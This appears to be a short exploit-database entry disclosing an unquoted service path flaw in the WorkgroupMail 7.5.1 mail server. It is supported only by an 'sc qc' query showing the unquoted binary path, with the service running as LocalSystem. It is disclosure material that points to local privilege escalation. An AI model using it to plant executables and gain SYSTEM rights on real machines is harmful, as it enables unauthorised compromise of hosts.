# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Softalk # Version : 7.5.1 # Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 # Tested on Windows 10 # CVE : N/A c:\>sc qc WorkgroupMail [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WorkgroupMail TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WorkgroupMail DEPENDENCIES : SERVICE_START_NAME : LocalSystem